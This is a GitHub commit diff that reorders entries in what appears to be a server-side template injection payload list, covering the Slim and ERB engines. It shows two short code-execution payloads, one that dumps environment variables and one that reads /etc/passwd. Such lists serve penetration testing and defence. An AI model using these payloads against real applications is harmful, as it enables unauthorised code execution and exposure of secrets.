Sorting like basic injection part

This commit is contained in:
idealphase 2020-04-30 17:15:31 +07:00 committed by GitHub
parent 7f1fb32980
commit 712e3b93f6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -91,17 +91,16 @@ Slim:
### Code execution
Execute code using SSTI for Slim engine.
```powershell
#{ %x|env| }
```
Execute code using SSTI for ERB engine.
```ruby
<%= system('cat /etc/passwd') %>
```
Execute code using SSTI for Slim engine.
```powershell
#{ %x|env| }
```
## Java